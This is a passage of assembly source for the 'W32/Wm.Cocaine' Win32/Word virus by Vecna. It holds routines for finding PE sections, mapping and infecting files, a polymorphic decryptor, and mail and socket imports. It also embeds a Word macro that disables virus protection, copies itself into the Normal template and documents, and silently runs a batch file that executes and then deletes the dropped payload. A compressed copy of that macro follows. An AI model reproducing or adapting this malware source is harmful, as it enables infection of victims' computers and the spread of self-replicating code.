dll_name equ dwo $-4 call strcmp jz @@1 @@0: add edx, 20 ;check next jmp @@2 ;process next dir @@3: jmp _rseh @@1: mov eax, [edx+16] ;pointer to name table pointer mov ebp, eax push edi call virtual2physical pop edi jc @@3 add eax, ebx mov edx, esi mov esi, eax sub ecx, ecx @@4: lodsd ;load pointer to name test eax, eax jz @@3 ;ebx=base inc ecx cmp eax, edi jz @@6 cmp eax, 077f00000h ja @@4 ;pointing to kernel? is bound xchg esi, edx push edi call virtual2physical ;edx=table esi=pe header pop edi jc @@3 push edi mov edi, [esp+(7*4)+4+8] ;load requested API push esi lea esi, [eax+ebx+2] dec edi @@7: inc edi lodsb test al, al jz @@5 cmp [edi], al je @@7 pop esi pop edi xchg esi, edx ;esi=table edx=pe header jmp @@4 @@5: pop eax pop eax @@6: dec ecx lea eax, [ebp+(ecx*4)] rseh: sub edx, edx pop dwo fs:[edx] ;remove frame pop edx mov dwo [esp+(7*4)], eax popad ret SearchIT endp strcmp proc push edx ebx edi @@2: mov bl, [eax] cmp bl, 'a' jb @@3 cmp bl, 'z' ja @@3 and bl, not 20h @@3: cmp by [ecx], 0 jz @@1 cmp [ecx], bl jnz @@1 inc ecx inc eax jmp @@2 @@1: pop edi ebx edx ret strcmp endp virtual2physical proc push ecx esi mov edi, esi movzx ecx, wo [esi+20] add edi, 24 add edi, ecx ;edi eq 1th section header movzx ecx, wo [esi+peh_nosections] @@0: push eax sub eax, [edi+12] ;sub RVA cmp eax, [edi+8] ;pointing inside? jb @@1 pop eax add edi, 40 ;next section header loop @@0 sub eax, eax stc ;signal error jmp @@2 @@1: add eax, [edi+20] ;add raw pointer pop ecx ;fix stack @@2: pop esi ecx ;eax=fisical place ret ;edi=section virtual2physical endp virtual2physical_ proc pushad mov esi, [ebp+(ofs pe_header-ofs vcode)] call virtual2physical mov [esp+(7*4)], eax popad ret virtual2physical_ endp physical2virtual_ proc pushad mov esi, [ebp+(ofs pe_header-ofs vcode)] call physical2virtual mov [esp+(7*4)], eax popad ret physical2virtual_ endp physical2virtual proc push ecx esi mov esi, [ebp+(ofs pe_header-ofs vcode)] mov edi, esi movzx ecx, wo [esi+20] add edi, 24 add edi, ecx ;edi eq 1th section header movzx ecx, wo [esi+peh_nosections] @@0: push eax sub eax, [edi+20] ;sub physical start cmp eax, [edi+16] ;still pointing to this section jb @@1 pop eax add edi, 40 ;next section header loop @@0 sub eax, eax stc ;signal error jmp @@2 @@1: add eax, [edi+12] ;add rva pop ecx @@2: pop esi ecx ;eax=fisical place ret ;edi=section physical2virtual endp MapFile proc mov eax, [ebp+(ofs mm_on_off-ofs vcode)] test eax, eax jz @@1 ;if [mm_on_off] contains a @ clc ;treat it like a memory mapped ret ;file @@1: push -1 mf_mode1 equ by $-1 pop ecx jecxz @@212 push 80h lea eax, [ebp+(ofs directory-ofs vcode)] push eax call [ebp+(ofs _SetFileAttributesA-ofs vcode)] test eax, eax jz error_map ;blank attributes @@212: sub eax, eax push eax push 80h push 3 mf_mode equ by $-1 push eax eax push 0c0000000h ;read/write lea eax, [ebp+(ofs directory-ofs vcode)] push eax call [ebp+(ofs _CreateFileA-ofs vcode)] inc eax jz error_mapf dec eax mov [ebp+(ofs handle1-ofs vcode)], eax sub ebx, ebx cmp [ebp+(ofs fsizel-ofs vcode)], ebx jne @@2 push ebx push eax call [ebp+(ofs _GetFileSize-ofs vcode)] mov [ebp+(ofs fsizel-ofs vcode)], eax sub edx, edx mov ecx, DIV_VALUE div ecx test edx, edx jz close_map @@2: sub eax, eax push eax push dwo [ebp+(ofs fsizel-ofs vcode)] push eax push 4 push eax push dwo [ebp+(ofs handle1-ofs vcode)] call [ebp+(ofs _CreateFileMappingA-ofs vcode)] test eax, eax jz close_map mov [ebp+(ofs handle2-ofs vcode)], eax sub eax, eax push dwo [ebp+(ofs fsizel-ofs vcode)] push eax eax push 2 push dwo [ebp+(ofs handle2-ofs vcode)] call [ebp+(ofs _MapViewOfFile-ofs vcode)] test eax, eax jz unmap_map ret MapFile endp CheckName proc push ebp call _seh mov esp,[esp+8] ;fix stack jmp remove_seh _seh: sub ecx, ecx push dwo fs:[ecx] mov fs:[ecx], esp cld call delta lea edi, [ebp+(ofs directory-ofs vcode)] push edi mov esi, [esp+(7*4)+(4*6)+(2*4)] ;get pointer to path name @@1: lodsb cmp al, '\' jne @@5 inc ecx ;signal slash found @@5: cmp al, '"' je @@1 cmp al, "'" ;ignore these je @@1 cmp al, 'a' jb @@3 cmp al, 'z' ja @@3 and al, not 20h ;make upcase @@3: stosb test al, al jnz @@1 dec edi jecxz @@7 @@2: mov al, by [edi-1] cmp al, 20h je @@8 add bl, al ;calc chksum @@8: dec edi cmp al, '\' ;find backslash jnz @@2 @@7: mov eax, edi pop edx jecxz @@6 sub eax, edx push ebx call ProcessDir ;process directory pop ebx @@6: sub edx, edx pop dwo fs:[edx] ;remove frame pop edx pop ebp ret CheckName endp UnmapFile proc mov eax, [ebp+(ofs mm_on_off-ofs vcode)] test eax, eax jz @@1 clc ret @@1: push dwo [ebp+(ofs map@-ofs vcode)] call [ebp+(ofs _UnmapViewOfFile-ofs vcode)] unmap_map: push dwo [ebp+(ofs handle2-ofs vcode)] call [ebp+(ofs _CloseHandle-ofs vcode)] close_map: lea eax, dwo [ebp+(ofs lw_creat_h-ofs vcode)] push eax sub eax, 8 push eax sub eax, 8 push eax push dwo [ebp+(ofs handle1-ofs vcode)] call [ebp+(ofs _SetFileTime-ofs vcode)] push dwo [ebp+(ofs handle1-ofs vcode)] call [ebp+(ofs _CloseHandle-ofs vcode)] error_mapf: push dwo [ebp+(ofs fattr-ofs vcode)] lea eax, [ebp+(ofs directory-ofs vcode)] push eax call [ebp+(ofs _SetFileAttributesA-ofs vcode)] error_map: sub eax, eax ret UnmapFile endp random0 proc sub eax, eax random proc push ecx edx push eax call delta mov eax, [ebp+(ofs pseed-ofs vcode)] mov ecx, 41c64e6dh mul ecx add eax, 3039h and eax, 7ffffffh mov [ebp+(ofs pseed-ofs vcode)], eax pop ecx jecxz @@3 ;limit set? sub edx, edx div ecx xchg eax, edx ;value = rnd MOD limit @@3: mov ecx, [esp+(2*4)] ;ecx=ret address cmp by [ecx], 0cch ;is ret address a int3? jne @@4 jmp ebp ;if so, start to exec garbage @@4: pop edx ecx sahf ;random flagz ret random endp random0 endp ;name +4 ;size +8 ;buffer +12 WriteDump proc sub eax, eax push eax push 12345678h ;hidden file wd_att equ dwo $-4 push 2 push eax eax push 0c0000000h ;read/write push dwo [esp+4+(6*4)] call [ebp+(ofs _CreateFileA-ofs vcode)] mov ebx, eax push 0 call @@61 dd 0 @@61: push dwo [esp+8+(2*4)] push dwo [esp+12+(3*4)] push ebx call [ebp+(ofs _WriteFile-ofs vcode)] push ebx call [ebp+(ofs _CloseHandle-ofs vcode)] ret 12 WriteDump endp FileMask db '\*.*', 0, 0, 0, 0 macro_crypt proc pushad mov al, 0 macro_key equ by $-1 mov ecx, ofs macro_end-ofs macro_start lea edi, [ebp+(ofs macro_start-ofs vcode)] @@1: xor by [edi], al inc edi loop @@1 popad ret macro_crypt endp CRC32 proc cld push ebx mov ecx, -1 mov edx, ecx NextByteCRC: xor eax, eax xor ebx, ebx lodsb xor al, cl mov cl, ch mov ch, dl mov dl, dh mov dh, 8 NextBitCRC: shr bx, 1 rcr ax, 1 jnc NoCRC xor ax, 08320h xor bx, 0edb8h NoCRC: dec dh jnz NextBitCRC xor ecx, eax xor edx, ebx dec di jnz NextByteCRC not edx not ecx pop ebx mov eax, edx rol eax, 16 mov ax, cx ret CRC32 endp OpenAncev proc sub eax, eax push eax push 80h push 3 push eax eax push 80000000h call @@1 ancevsys db 'C:\ANCEV.SYS', 0 @@1: call [ebp+(ofs _CreateFileA-ofs vcode)] inc eax jz @@filedontexists dec eax push eax call [ebp+(ofs _CloseHandle-ofs vcode)] @@fileexists: clc ret @@filedontexists: stc ret OpenAncev endp align 4 dec_end_code equ this byte DecriptInit proc cld sub eax, eax db 0b8h+5 ;mov ebp, delta _delta dd 00403000h lea ebx, [ebp+(ofs vinit-ofs vcode)] push ebx lea ebx, [ebp+(ofs dec_end_code-ofs vcode)] push dwo fs:[eax] mov fs:[eax], esp ;set new seh frame mov edi, ebp mov eax, 0 key1 equ dwo $-4 @@1: xor [edi], eax scasd add eax, 12345678h org $-4 key2 dd 0 cmp edi, ebx jne @@1 mov eax, cs:[0] ;cause fault DecriptInit endp ENDIF vend equ this byte ;END OF PHYSICAL BODY db 'EOV', 0 align 4 k32_address equ this byte _CreateProcessA dd 0 _CreateFileA dd 0 _WinExec dd 0 _CloseHandle dd 0 ;add here a var that hold the _LoadLibraryA dd 0 _FreeLibrary dd 0 _CreateFileMappingA dd 0 _MapViewOfFile dd 0 _UnmapViewOfFile dd 0 _FindFirstFileA dd 0 _FindNextFileA dd 0 _FindClose dd 0 _SetEndOfFile dd 0 _VirtualAlloc dd 0 _VirtualFree dd 0 _GetSystemTime dd 0 _GetWindowsDirectoryA dd 0 _GetSystemDirectoryA dd 0 _GetCurrentDirectoryA dd 0 _SetFileAttributesA dd 0 _SetFileTime dd 0 _ExitProcess dd 0 _GetCurrentProcess dd 0 _WriteProcessMemory dd 0 _WriteFile dd 0 _DeleteFileA dd 0 _Sleep dd 0 _CreateThread dd 0 _GetFileSize dd 0 _SetFilePointer dd 0 _MessageBoxA dd 0 _FindWindowA dd 0 _PostMessageA dd 0 _RegCloseKey dd 0 _RegQueryValueEx dd 0 _RegOpenKeyEx dd 0 _RegCreateKeyEx dd 0 _RegSetValueEx dd 0 _GetModuleHandle dd 0 _GetProcAddress dd 0 ;basic api init _connect dd 0 _recv dd 0 _MAPISendMail dd 0 old_eip dd 0 ;first entrypoint place patch_jump dd 0 ;where last jump is(patch!!) sRVA dd 0 ;CODE section paramz, for RawSize dd 0 ;branch_entry lgarble db 0 ;last garble indicator inf? db 0 ;can infect file? _dec dw 0 ;instruction used to decript K32 dd 0 ;kernel32 base U32 dd 0 ;user32 base pseed dd 0 ;poly seed variables dd 0 reg32 dd 0 ;table of reg used buffer dd 0 ;current work buffer _size dd 0 ;size to encript entry dd 0 ;delta to entrypoint rva dd 0 ;place in meory where virus ;will run flagz dd 0 ;garbling flagz c_reg dd 0 ;actual counter reg p_reg dd 0 ;actual pointer reg recurse dd 0 ;recursion deep decriptor dd 0 ;start of decriptor in current ;buffer search_handle dd 0 _socket dd 0 socket dd MAX_SOCK dup (0) recv_size dd 0 recv_buff dd 0 email_w dd 0 thread dd 0 email db 128 dup (0) email_crc dd 0 secz db 0 mdeep db 0 align 4 handle1 dd 0 handle2 dd 0 map@ dd 0 ;map address tamanho dd 0 ;total added size ep dd 0 ;new entrypoint image_infect dd 0 OurTimer dd 0 polybuffer dd 0 ;address of buffer for poly buffer1 dd 0 ;temporary poly bufferz buffer2 dd 0 mm_on_off dd 0 pe_header dd 0 seed dd 0 ;main random seed _mapi dd 0 subject dd 0 directory db MAX_PATH dup (0) ;work directory structure lparm dd 0 lvars dd 0 subs_index dd 0 s_into db 0 _pusha db 0 fname db 32 dup (0) align 4 current_time equ this byte _year dw 0 _month dw 0 _dayofweek dw 0 _day dw 0 _hour dw 0 _minute dw 0 _second dw 0 _milisecond dw 0 find_data equ this byte fattr dd 0 c_creat_h dd 0 c_creat_l dd 0 la_creat_h dd 0 la_creat_l dd 0 lw_creat_h dd 0 lw_creat_l dd 0 fsizeh dd 0 fsizel dd 0 reserved dd 0, 0 filename db 260 dup (0) altname db 13 dup (0) altext db 3 dup (0) subs_table db 6*MAX_SUBROUTINES dup (0) ;dd where sub reside ;db no. of param that sub clean ;db no. of vars that sub alloc MapiMessage struc resd dd ? lpszSubject dd ? lpszNoteText dd ? lpszMessageType dd ? lpszDateReceived dd ? lpszConversationID dd ? flags dd ? lpOriginator dd ? nRecipCount dd ? lpRecips dd ? nFileCount dd ? lpFiles dd ? MapiMessage ends MapiRecipDesc struc resd dd ? ulRecipClass dd ? lpszName dd ? lpszAddress dd ? ulEIDSize dd ? lpEntryID dd ? MapiRecipDesc ends MapiFileDesc struc resd dd ? flFlags dd ? nPosition dd ? lpszPathName dd ? lpszFileName dd ? lpFileType dd ? MapiFileDesc ends MF MapiFileDesc <0> mend equ this byte _VSEG ends end main ;----------------------------------(HOST.INC)--------------------------------- ;Generic Host ;(c) Vecna 1999 ;First generation host. Just pass control to virus and, when get control again ;show a dialog box and exit. _TEXT segment dword use32 public'CODE' extrn ShellAboutA:Proc extrn ExitProcess:pRoc ;I_AM_IDIOT_USER_THAT_CANT_COMPILE EQU TRUE ;antilamer code :P main proc IFNDEF I_AM_IDIOT_USER_THAT_CANT_COMPILE jmp DecriptInit ENDIF host: push 0 push ofs tit push ofs msg push 0 call ShellAboutA push 0 call ExitProcess main endp _TEXT ends _DATA segment dword use32 public 'DATA' tit db 'W32/Wm.Cocaine by Vecna', 0 msg db 'Cocaine - A Win32/WinWord Virus#' db 'Cocaine - Your PC is now addicted', 0 _DATA ends ;----------------------------------(HOST.INC)--------------------------------- ;-----------------------------------(LZ.INC)---------------------------------- ;LZ Decompression routines ;(c) Vecna 1999 ;Converted from a C source ;These routines decompress a LZ packed buffer. They where coded in C, and ;converted to ASM using BCC32 with the -S switch. Beside the normal switchs ;to optimize, this was optimized by hand a bit. Virogen have in his www page ;a more optimized version of this routine, and other related material about ;compression in win32asm. ;void fast_copy(p_src,p_dst,len) ; fast_copy proc push edi esi ecx mov ecx,dword ptr [esp+ 4+(4*3)] mov edi,dword ptr [esp+ 8+(4*3)] mov esi,dword ptr [esp+12+(4*3)] cld rep movsb pop ecx esi edi ret 12 fast_copy endp lzrw1_decompress proc near ?live1@768: ; ; void lzrw1_decompress(p_src_first,src_len,p_dst_first,p_dst_len) ; @27: push ebp mov ebp,esp add esp,-8 push ebx push esi push edi ; ; /* Input : Specify input block using p_src_first and src_len. */ ; /* Input : Point p_dst_first to the start of the output zone. */ ; /* Input : Point p_dst_len to a ULONG to receive the output length. */ ; /* Input : Input block and output zone must not overlap. User knows */ ; /* Input : upperbound on output block length from earlier compression. */ ; /* Input : In any case, maximum expansion possible is eight times. */ ; /* Output : Length of output block written to *p_dst_len. */ ; /* Output : Output block in Mem[p_dst_first..p_dst_first+*p_dst_len-1]. */ ; /* Output : Writes only in Mem[p_dst_first..p_dst_first+*p_dst_len-1]. */ ; UBYTE *p_src_first, *p_dst_first; ULONG src_len, *p_dst_len; ; {UWORD controlbits=0, control; ; ?live1@784: ; EDI = control, ECX = p_src_first xor esi,esi ?live1@800: ; mov ecx,dword ptr [ebp+20] ; ; UBYTE *p_src=p_src_first+FLAG_BYTES, *p_dst=p_dst_first, ; *p_src_post=p_src_first+src_len; ; ?live1@816: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first ; mov ebx,dword ptr [ebp+16] add ebx,ecx ?live1@832: ; EDI = control, ESI = controlbits, ECX = p_src_first mov edx,dword ptr [ebp+12] ?live1@848: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first ; mov dword ptr [ebp-4],ebx ?live1@864: ; EDI = control, ESI = controlbits, ECX = p_src_first lea eax,dword ptr [ecx+4] ; ; if (*p_src_first==FLAG_COPY) ; ?live1@880: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first ; cmp byte ptr [ecx],1 jne short @28 ; ; {fast_copy(p_src_first+FLAG_BYTES,p_dst_first,src_len-FLAG_BYTES); ; ?live1@896: ; ECX = p_src_first add ecx,4 push ecx mov eax,dword ptr [ebp+12] push eax mov edi,dword ptr [ebp+16] sub edi,4 push edi call fast_copy ; ; *p_dst_len=src_len-FLAG_BYTES; return;} ; ?live1@912: ; EDI = @temp14 mov eax,dword ptr [ebp+8] mov dword ptr [eax],edi jmp short @29 ; ; while (p_src!=p_src_post) ; ?live1@928: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits @28: cmp eax,dword ptr [ebp-4] je short @31 ; ; {if (controlbits==0) ; @30: test esi,esi jne short @32 ; ; {control=*p_src++; control|=(*p_src++)<<8; controlbits=16;} ; ?live1@960: ; EAX = p_src, EDX = p_dst movzx edi,byte ptr [eax] inc eax xor ecx,ecx ; mov esi,16 push 16 pop esi mov cl,byte ptr [eax] shl ecx,8 or edi,ecx inc eax ; ; if (control&1) ; ?live1@976: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits @32: test edi,1 je short @33 ; jnc short @33 ; ; {UWORD offset,len; UBYTE *p; ; offset=(*p_src&0xF0)<<4; len=1+(*p_src++&0xF); ; @34: xor ebx,ebx xor ecx,ecx mov bl,byte ptr [eax] mov cl,byte ptr [eax] and ebx,15 inc eax inc ebx and ecx,240 mov dword ptr [ebp-8],ebx ; ; offset+=*p_src++&0xFF; p=p_dst-offset; ; ?live1@1008: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = offset ; xor ebx,ebx mov bl,byte ptr [eax] inc eax ?live1@1024: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits shl ecx,4 ?live1@1040: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = offset ; and ebx,255 add ecx,ebx mov ebx,edx sub ebx,ecx mov ecx,ebx jmp short @36 ; ; while (len--) *p_dst++=*p++;} ; ?live1@1056: ; EAX = p_src, EDX = p_dst, ECX = p, EDI = control, ESI = controlbits ; @35: mov bl,byte ptr [ecx] inc ecx mov byte ptr [edx],bl inc edx @36: mov ebx,dword ptr [ebp-8] add dword ptr [ebp-8],-1 test ebx,ebx jne short @35 @37: jmp short @38 ; ; else ; *p_dst++=*p_src++; ; ?live1@1072: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits @33: mov cl,byte ptr [eax] inc eax mov byte ptr [edx],cl inc edx ; ; control>>=1; controlbits--; ; @38: shr edi,1 dec esi cmp eax,dword ptr [ebp-4] jne short @30 ; ; } ; *p_dst_len=p_dst-p_dst_first; ; ?live1@1120: ; EDX = p_dst @31: sub edx,dword ptr [ebp+12] mov eax,dword ptr [ebp+8] mov dword ptr [eax],edx ; ; } ; ?live1@1136: ; @39: @29: pop edi pop esi pop ebx pop ecx pop ecx pop ebp ret 16 lzrw1_decompress endp ;-----------------------------------(LZ.INC)---------------------------------- ;---------------------------------(MACRO.INC)--------------------------------- ;Macro poly data ;(c) Vecna 1999 ;ASM->COM->LZ->INC ;The code in COMMENT bellow is to be compiled to a .COM file, then compressed ;with my LZ compressor, then BIN2INCed. It is the code used for macro poly ;engine and do the actual infection process. The macro code is divided in ;chunks. The format of each chunks is simple: the first byte indicate the ;step that this chunk will be processed, and follow a ASCIIZ string. The macro ;poly engine copies each chunk, mixing the ones from the same level between ;themselfs, and inserting macro garbage code between real macro lines. Some ;chunks(6) receive special processing by the engine ;-) ;The macro poly engine also do magic with the %X labels: they're changed by ;random strings. ; '%1 ; SUB AUTOCLOSE() ; ON ERROR RESUME NEXT ;OPTIONS.VIRUSPROTECTION = FALSE ; OPTIONS.CONFIRMCONVERSIONS = FALSE ; OPTIONS.SAVENORMALPROMPT = FALSE ; APPLICATION.DISPLAYALERTS = WDALERTSNONE ; SHOWVISUALBASICEDITOR = FALSE ; %2=1 ; %3=1 ; FOR %4 = 1 TO NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS.COUNT ; IF NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "'%1" THEN %2=%4 ; NEXT %4 ; FOR %4 = 1 TO ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS.COUNT ; IF ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "'%1" THEN %3=%4 ; NEXT %4 ; OPEN "C:\%7.BAT" FOR OUTPUT AS 1 ; PRINT #1,"@ECHO OFF" ; PRINT #1,"DEBUG NUL" ; PRINT #1,"COPY C:\W32COKE.EX C:\W32COKE.EXE >NUL" ; PRINT #1,"C:\W32COKE.EXE" ; PRINT #1,"DEL C:\W32COKE.EX >NUL" ; PRINT #1,"DEL C:\COCAINE.SRC >NUL" ; PRINT #1,"DEL C:\COCAINE.SYS >NUL" ; PRINT #1,"DEL C:\W32COKE.EXE >NUL" ; PRINT #1,"DEL C:\%7.BAT >NUL" ; CLOSE #1 ; SET %5 = NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%2).CODEMODULE ; SET %6 = ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%3).CODEMODULE ; IF %5.LINES(1, 1) <> "'%1" THEN ; %5.DELETELINES 1, %5.COUNTOFLINES ; %5.INSERTLINES 1, %6.LINES(1, %6.COUNTOFLINES) ; END IF ; IF %6.LINES(1, 1) <> "'%1" THEN ; %6.DELETELINES 1, %6.COUNTOFLINES ; %6.INSERTLINES 1, %5.LINES(1, %5.COUNTOFLINES) ; END IF ; OPEN "C:\ANCEV.SYS" FOR OUTPUT AS 1 ; CLOSE 1 ; SHELL %7.BAT, VBHIDE ; FOR %4 = 1 TO 100 ; NEXT %4 ; KILL %7.BAT ; END SUB ; ; The following code should be compiled to a .COM file: ; ; .MODEL TINY ; .CODE ; .STARTUP ; ; CRLF EQU <13,10> ; ; DB 1 ; DB "'%1", CRLF ; DB "SUB AUTOCLOSE()", CRLF ; DB "ON ERROR RESUME NEXT", CRLF ; DB 0 ; ; DB 2 ; DB "OPTIONS.VIRUSPROTECTION = FALSE", CRLF ; DB 0 ; ; DB 2 ; DB "OPTIONS.CONFIRMCONVERSIONS = FALSE", CRLF ; DB 0 ; ; DB 2 ; DB "OPTIONS.SAVENORMALPROMPT = FALSE", CRLF ; DB 0 ; ; DB 2 ; DB "APPLICATION.DISPLAYALERTS = WDALERTSNONE", CRLF ; DB 0 ; ; DB 2 ; DB "SHOWVISUALBASICEDITOR = FALSE", CRLF ; DB 0 ; ; DB 2 ; DB "%2=1", CRLF ; DB 0 ; ; DB 2 ; DB "%3=1", CRLF ; DB 0 ; ; DB 3 ; DB "FOR %4 = 1 TO NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS.COUNT", CRLF ; DB 'IF NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "''%1" THEN %2=%4', CRLF ; DB "NEXT %4", CRLF ; DB 0 ; ; DB 3 ; DB "FOR %4 = 1 TO ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS.COUNT", CRLF ; DB 'IF ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "''%1" THEN %3=%4', CRLF ; DB "NEXT %4", CRLF ; DB 0 ; ; DB 3 ; DB 'OPEN "C:\%7.BAT" FOR OUTPUT AS 1', CRLF ; DB 'PRINT #1,"@ECHO OFF"', CRLF ; DB 'PRINT #1,"DEBUG NUL"', CRLF ; DB 'PRINT #1,"COPY C:\W32COKE.EX C:\W32COKE.EXE >NUL"', CRLF ; DB 'PRINT #1,"C:\W32COKE.EXE"', CRLF ; DB 'PRINT #1,"DEL C:\W32COKE.EX >NUL"', CRLF ; DB 'PRINT #1,"DEL C:\COCAINE.SRC >NUL"', CRLF ; DB 'PRINT #1,"DEL C:\COCAINE.SYS >NUL"', CRLF ; DB 'PRINT #1,"DEL C:\W32COKE.EXE >NUL"', CRLF ; DB 'PRINT #1,"DEL C:\%7.BAT >NUL"', CRLF ; DB 'CLOSE #1', CRLF ; DB 0 ; ; DB 4 ; DB "SET %5 = NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%2).CODEMODULE", CRLF ; DB 0 ; ; DB 4 ; DB "SET %6 = ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%3).CODEMODULE", CRLF ; DB 0 ; ; DB 5 ; DB 'IF %5.LINES(1, 1) <> "''%1" THEN', CRLF ; DB "%5.DELETELINES 1, %5.COUNTOFLINES", CRLF ; DB "%5.INSERTLINES 1, %6.LINES(1, %6.COUNTOFLINES)", CRLF ; DB "END IF", CRLF ; DB 0 ; ; DB 5 ; DB 'IF %6.LINES(1, 1) <> "''%1" THEN', CRLF ; DB "%6.DELETELINES 1, %6.COUNTOFLINES", CRLF ; DB "%6.INSERTLINES 1, %5.LINES(1, %5.COUNTOFLINES)", CRLF ; DB "END IF", CRLF ; DB 0 ; ; DB 6 ;;CREATE DEBUG SCRIPT ; DB 0 ; ; DB 7 ; DB 'OPEN "C:\ANCEV.SYS" FOR OUTPUT AS 1', CRLF ; DB 'PRINT #1,""', CRLF ; DB "CLOSE #1", CRLF ; DB 0 ; ; DB 7 ; DB "SHELL %7.BAT, VBHIDE", CRLF ; DB "FOR %4=1 TO 100", CRLF ; DB "NEXT %4", CRLF ; DB "KILL %7.BAT", CRLF ; DB 0 ; ; DB 8 ; DB "END SUB", CRLF ; DB 0 ; ; END macro_sized dd 0 macro_size EQU 750 ; size in bytes macros DB 000H,000H,000H,000H,000H,000H,001H,027H,025H,031H,00DH,00AH,053H,055H DB 042H,020H,041H,055H,054H,04FH,043H,04CH,000H,000H,04FH,053H,045H,028H,029H DB 00DH,00AH,04FH,04EH,020H,045H,052H,052H,04FH,052H,020H,000H,000H,052H,045H DB 053H,055H,04DH,045H,020H,04EH,045H,058H,054H,00DH,00AH,000H,002H,04FH,000H DB 000H,050H,054H,049H,04FH,04EH,053H,02EH,056H,049H,052H,055H,053H,050H,052H DB 04FH,054H,004H,008H,045H,043H,003H,011H,020H,03DH,020H,046H,041H,04CH,053H DB 045H,00BH,023H,043H,04FH,04EH,046H,008H,007H,049H,052H,04DH,002H,007H,056H DB 045H,052H,053H,003H,036H,00FH,026H,003H,049H,053H,041H,056H,045H,04EH,020H DB 002H,04FH,052H,04DH,041H,04CH,002H,04EH,04DH,050H,054H,00BH,024H,041H,050H DB 050H,04CH,049H,043H,002H,000H,041H,003H,061H,02EH,044H,049H,053H,050H,04CH DB 041H,059H,041H,04CH,045H,052H,054H,053H,089H,000H,002H,025H,057H,044H,005H DB 00BH,04EH,04FH,04EH,004H,076H,053H,048H,04FH,057H,056H,049H,053H,055H,000H DB 018H,041H,04CH,042H,041H,053H,049H,043H,045H,044H,049H,054H,002H,0BEH,00AH DB 097H,025H,032H,03DH,021H,009H,002H,0E9H,000H,002H,025H,033H,004H,008H,003H DB 046H,002H,01FH,025H,034H,002H,04AH,031H,020H,054H,04FH,022H,068H,020H,005H DB 083H,054H,045H,04DH,002H,065H,054H,045H,02EH,056H,042H,002H,08EH,04AH,002H DB 0DCH,002H,00AH,043H,008H,090H,04FH,04DH,050H,002H,065H,04EH,054H,053H,02EH DB 043H,04FH,055H,04EH,012H,007H,049H,046H,00FH,030H,043H,000H,00FH,030H,005H DB 030H,028H,025H,034H,029H,002H,034H,044H,045H,04DH,04FH,044H,055H,04CH,045H DB 02EH,000H,014H,04CH,049H,04EH,045H,053H,028H,031H,02CH,031H,029H,002H,077H DB 022H,012H,079H,022H,020H,054H,010H,0AAH,048H,045H,04EH,020H,002H,09BH,025H DB 034H,00DH,00AH,013H,064H,020H,003H,009H,000H,00EH,09DH,041H,012H,064H,020H DB 0BBH,056H,045H,044H,04FH,043H,012H,08AH,04EH,054H,002H,093H,00FH,09DH,045H DB 00DH,09DH,00FH,030H,00FH,0CDH,04EH,003H,030H,0CBH,004H,00FH,09DH,00FH,09DH DB 031H,007H,09DH,033H,03DH,003H,094H,00AH,09DH,04FH,050H,002H,0B4H,022H,043H DB 03AH,05CH,025H,080H,000H,037H,02EH,042H,041H,054H,022H,020H,013H,04BH,04FH DB 055H,054H,050H,055H,054H,020H,041H,004H,000H,053H,020H,012H,066H,050H,052H DB 049H,04EH,054H,020H,023H,031H,02CH,022H,040H,045H,043H,000H,002H,048H,04FH DB 020H,04FH,046H,046H,022H,00DH,00AH,009H,016H,044H,045H,042H,055H,047H,020H DB 042H,000H,03CH,002H,043H,043H,04FH,043H,041H,012H,016H,02EH,053H,052H,043H DB 020H,03EH,04EH,055H,04CH,041H,000H,00CH,027H,043H,04FH,050H,059H,020H,002H DB 025H,057H,033H,032H,043H,04FH,04BH,045H,02EH,045H,06AH,031H,058H,00DH,00EH DB 045H,00FH,033H,02CH,003H,096H,009H,02EH,045H,00CH,04EH,044H,045H,04CH,00DH DB 03FH,00FH,03EH,02CH,022H,09FH,0FFH,006H,023H,00FH,095H,00FH,047H,003H,047H DB 008H,024H,059H,053H,00FH,048H,008H,048H,00AH,08AH,00FH,024H,008H,024H,015H DB 044H,007H,01FH,034H,080H,012H,039H,001H,06FH,032H,048H,004H,053H,045H,054H DB 020H,025H,035H,022H,02AH,02FH,09CH,01FH,0CFH,016H,0CFH,032H,02BH,06CH,008H DB 041H,036H,0AFH,014H,002H,041H,02FH,010H,00FH,041H,006H,041H,033H,00EH,041H DB 005H,022H,0E8H,025H,035H,028H,0B6H,020H,022H,0B7H,03CH,03EH,020H,019H,071H DB 029H,0B8H,00DH,00AH,002H,01EH,012H,033H,045H,054H,045H,024H,03DH,020H,031H DB 02CH,002H,0B1H,022H,0F1H,032H,025H,04FH,0C6H,065H,046H,004H,013H,004H,023H DB 049H,04EH,053H,032H,0B5H,004H,010H,004H,023H,036H,009H,053H,025H,036H,00CH DB 02FH,042H,079H,045H,0E0H,0F3H,04EH,044H,020H,049H,046H,002H,0BFH,004H,07EH DB 00AH,02BH,00FH,07EH,002H,05BH,036H,02EH,00FH,07EH,00DH,04FH,004H,023H,00FH DB 07EH,033H,002H,00AH,0D1H,002H,0BFH,043H,04FH,009H,0ADH,00BH,07EH,006H,000H DB 007H,028H,0E7H,041H,04EH,043H,045H,056H,02EH,078H,040H,053H,059H,053H,02FH DB 